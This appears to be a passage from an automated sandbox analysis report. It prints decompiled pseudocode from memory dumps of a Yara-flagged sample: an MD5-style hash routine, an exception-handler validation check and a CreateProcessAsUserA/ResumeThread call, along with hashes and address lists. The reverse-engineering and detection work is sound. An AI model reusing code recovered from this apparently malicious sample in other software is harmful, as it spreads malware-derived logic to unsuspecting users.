				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x027728ec
0x027728f7
0x027728fa
0x027728fd
0x027728fe
0x027728fe
0x02772909
0x0277291a
0x0277291c
0x0277291f
0x0277291f
0x02772922
0x02772922
0x02772925
0x02772925
0x02772928
0x02772928
0x02772945
0x02772948
0x0277295e
0x02772961
0x0277297b
0x0277297e
0x02772994
0x02772997
0x02772999
0x027729b1
0x027729b4
0x027729b7
0x027729cf
0x027729d2
0x027729ec
0x027729ef
0x02772a05
0x02772a08
0x02772a0a
0x02772a22
0x02772a27
0x02772a2a
0x02772a40
0x02772a43
0x02772a5d
0x02772a60
0x02772a76
0x02772a79
0x02772a7b
0x02772a96
0x02772a99
0x02772ab0
0x02772ab3
0x02772ab7
0x02772ad0
0x02772ad3
0x02772ad5
0x02772ad8
0x02772af3
0x02772af6
0x02772b0f
0x02772b12
0x02772b22
0x02772b25
0x02772b3d
0x02772b40
0x02772b5a
0x02772b5d
0x02772b75
0x02772b78
0x02772b8e
0x02772b91
0x02772ba9
0x02772bac
0x02772bc4
0x02772bc7
0x02772be1
0x02772be4
0x02772bfa
0x02772bfd
0x02772c15
0x02772c18
0x02772c32
0x02772c35
0x02772c4d
0x02772c50
0x02772c66
0x02772c69
0x02772c81
0x02772c84
0x02772c9c
0x02772c9f
0x02772cb1
0x02772cb4
0x02772cc6
0x02772cc9
0x02772cdb
0x02772cde
0x02772ce2
0x02772cf2
0x02772cf5
0x02772d03
0x02772d06
0x02772d18
0x02772d1b
0x02772d2f
0x02772d32
0x02772d34
0x02772d44
0x02772d47
0x02772d59
0x02772d5c
0x02772d6a
0x02772d6d
0x02772d7f
0x02772d82
0x02772d86
0x02772d96
0x02772d99
0x02772dab
0x02772dae
0x02772dbc
0x02772dbf
0x02772dd1
0x02772dd4
0x02772de6
0x02772de9
0x02772dfd
0x02772e00
0x02772e14
0x02772e17
0x02772e2b
0x02772e2e
0x02772e42
0x02772e45
0x02772e59
0x02772e5c
0x02772e70
0x02772e75
0x02772e87
0x02772e8a
0x02772e9e
0x02772ea1
0x02772eb5
0x02772eb8
0x02772ece
0x02772ed1
0x02772ee5
0x02772ee8
0x02772efa
0x02772efd
0x02772f11
0x02772f14
0x02772f28
0x02772f2b
0x02772f3f
0x02772f48
0x02772f4b
0x02772f54
0x02772f5d
0x02772f65
0x02772f6d
0x02772f77
0x02772f8c

APIs

memset.NTDLL ref: 02772F80

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
Instruction ID: 7197367c1c086927686cb20dc068867e4041eb3392e2996bf7983a7bb78062a1
Opcode Fuzzy Hash: 63541d09d44a16f12ea67eea49ab1383879bbcc9d20cb7b9c3abc084077f7095
Instruction Fuzzy Hash: 4622847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 0540BBA1, Relevance: 1.8, APIs: 1, Instructions: 556COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,00000000,000000FE,?,?,00000000), ref: 0540BF5F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 2629d809d7b90dea9fc22cbad78637cf9a1a57b6cc2a08efbb0b7b2521abfc62
Instruction ID: 50c4129b0b0225fe224ecc88845ce61a2c32c41a1242fd361d69e6b8936c0a88
Opcode Fuzzy Hash: 2629d809d7b90dea9fc22cbad78637cf9a1a57b6cc2a08efbb0b7b2521abfc62
Instruction Fuzzy Hash: 42323671A04204DBDF19CF68C584AEEBBB2FF84310F2492AAD855AB385D770DA41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0277B159, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0277B159(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x277d290; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x277d2d8 = 1;
										__eflags =  *0x277d2d8;
										if( *0x277d2d8 != 0) {
											goto L60;
										}
										_t84 =  *0x277d290; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x277d2d8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x277d290 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x277d298 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x277d294 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x277d298 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x277d298 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x277d2d8 = 1;
							__eflags =  *0x277d2d8;
							if( *0x277d2d8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x277d298 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x277d298 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x277d2d8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x277d298 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x277d290 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x277d298 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x277d298 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x0277b163
0x0277b166
0x0277b16c
0x0277b18a
0x00000000
0x0277b18a
0x0277b174
0x0277b17d
0x0277b183
0x0277b192
0x0277b195
0x0277b198
0x0277b1a2
0x0277b1a2
0x0277b1a4
0x0277b1a7
0x0277b1a9
0x0277b1a9
0x0277b1ab
0x0277b1ae
0x00000000
0x00000000
0x0277b1b0
0x0277b1b2
0x0277b218
0x0277b218
0x0277b376
0x00000000
0x0277b376
0x0277b1b4
0x0277b1b4
0x0277b1b8
0x0277b1ba
0x0277b1ba
0x0277b1ba
0x0277b1ba
0x0277b1bd
0x0277b1be
0x0277b1c1
0x0277b1c1
0x0277b1c5
0x0277b1c9
0x0277b1d7
0x0277b1d7
0x0277b1df
0x0277b1e5
0x0277b1e7
0x0277b1e9
0x0277b1f9
0x0277b206
0x0277b20a
0x0277b20f
0x0277b211
0x0277b28f
0x0277b28f
0x0277b213
0x0277b213
0x0277b213
0x0277b291
0x0277b293
0x0277b374
0x0277b374
0x00000000
0x0277b299
0x0277b299
0x0277b2a0
0x00000000
0x00000000
0x0277b2a6
0x0277b2aa
0x0277b306
0x0277b308
0x0277b310
0x0277b312
0x0277b314
0x00000000
0x00000000
0x0277b316
0x0277b31c
0x0277b31e
0x0277b320
0x0277b335
0x0277b335
0x0277b337
0x0277b366
0x0277b36d
0x00000000
0x0277b36d
0x0277b33b
0x0277b33c
0x0277b33e
0x0277b340
0x0277b340
0x0277b342
0x0277b344
0x0277b346
0x0277b35a
0x0277b35a
0x0277b35d
0x0277b35f
0x0277b35f
0x0277b360
0x0277b360
0x00000000
0x0277b348
0x0277b348
0x0277b348
0x0277b351
0x0277b352
0x0277b354
0x0277b356
0x0277b356
0x00000000
0x0277b348
0x0277b346
0x0277b322
0x0277b329
0x0277b329
0x0277b32b
0x00000000
0x00000000
0x0277b32d
0x0277b32e
0x0277b331
0x0277b333
0x00000000
0x00000000
0x00000000
0x0277b333
0x00000000
0x0277b329
0x0277b2ac
0x0277b2af
0x0277b2b4
0x00000000
0x00000000
0x0277b2bd
0x0277b2bf
0x0277b2c5
0x00000000
0x00000000
0x0277b2cb
0x0277b2d1
0x00000000
0x00000000
0x0277b2d7
0x0277b2d9
0x0277b2e2
0x0277b2e6
0x00000000
0x00000000
0x0277b2ec
0x0277b2ef
0x0277b2f1
0x00000000
0x00000000
0x0277b2f8
0x0277b2fa
0x00000000
0x00000000
0x0277b2fc
0x0277b300
0x00000000
0x00000000
0x00000000
0x0277b300
0x00000000
0x00000000
0x00000000
0x0277b1eb
0x0277b1eb
0x0277b1eb
0x0277b1f2
0x00000000
0x00000000
0x0277b1f4
0x0277b1f5
0x0277b1f7
0x00000000
0x00000000
0x00000000
0x0277b1f7
0x0277b21f
0x0277b221
0x00000000
0x00000000
0x0277b231
0x0277b233
0x0277b235
0x00000000
0x00000000
0x0277b23b
0x0277b242
0x0277b26e
0x0277b26e
0x0277b270
0x0277b272
0x0277b286
0x0277b288
0x00000000
0x00000000
0x00000000
0x00000000
0x0277b274
0x0277b274
0x0277b274
0x0277b27d
0x0277b27e
0x0277b280
0x0277b282
0x0277b282
0x00000000
0x0277b274
0x0277b244
0x0277b244
0x0277b247
0x0277b249
0x0277b25b
0x0277b25b
0x0277b25e
0x0277b260
0x0277b260
0x0277b261
0x0277b261
0x0277b267
0x0277b267
0x00000000
0x00000000
0x00000000
0x00000000
0x0277b24b
0x0277b24b
0x0277b24b
0x0277b252
0x00000000
0x00000000
0x0277b254
0x0277b254
0x0277b255
0x00000000
0x00000000
0x00000000
0x0277b255
0x0277b257
0x0277b259
0x0277b26c
0x00000000
0x00000000
0x00000000
0x0277b26c
0x00000000
0x0277b259
0x0277b1cb
0x0277b1ce
0x0277b1d1
0x00000000
0x00000000
0x0277b1d3
0x0277b1d5
0x00000000
0x00000000
0x00000000
0x0277b1d5
0x0277b19a
0x0277b19c
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0277B20A

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 4ec5d6751768b3b7ae7d03b848592f8cfa226659733f1d69f34b3274d571de2f
Instruction ID: 73a1ade947102b4d3a1cc5fc074fbd4d0c347d3439512080ba22cc61dd21b6ae
Opcode Fuzzy Hash: 4ec5d6751768b3b7ae7d03b848592f8cfa226659733f1d69f34b3274d571de2f
Instruction Fuzzy Hash: 8961B030B016469FDF2ACE28C8D477A73A2EF9635CF24A669D845DB194E730D986C740

Uniqueness

Uniqueness Score: -1.00%

Function 0541CFA3, Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

@, xrefs: 0541D2DD

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4c68db6427f204c32bb2b150e82373803e66f9f88d22022b498809aea5e66318
Instruction ID: 14b047bb5023c3497fee9de5e895d92bb213b1c6aab185c8d827f25dff17b653
Opcode Fuzzy Hash: 4c68db6427f204c32bb2b150e82373803e66f9f88d22022b498809aea5e66318
Instruction Fuzzy Hash: 9BD15CB1E0425ADBCB18CFA8C5905FEBBB2FF84304F24816ED85297344E7749A56CB58

Uniqueness

Uniqueness Score: -1.00%

Function 054235BC, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 054235F6

Part of subcall function 0540F64E: ResumeThread.KERNEL32(00000004,?,05402498,?), ref: 0540F663

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CreateProcessResumeThreadUser
String ID:
API String ID: 3393100766-0
Opcode ID: f1a2b2a36d4385903de5d5bd8074fb93665dee8fd1bc90cc8ac2ec3eef1b65e6
Instruction ID: 1148eb12dd311c5018ffa8d9a517499add8cf1ed1e7b2163634593e47d7e7a90
Opcode Fuzzy Hash: f1a2b2a36d4385903de5d5bd8074fb93665dee8fd1bc90cc8ac2ec3eef1b65e6
Instruction Fuzzy Hash: 42F0F932215129BF9F024F99DC41CDA7F6AFF5D374B054226FE1992260C732D832ABA4

Uniqueness

Uniqueness Score: -1.00%

Function 05414518, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 05414530

Memory Dump Source

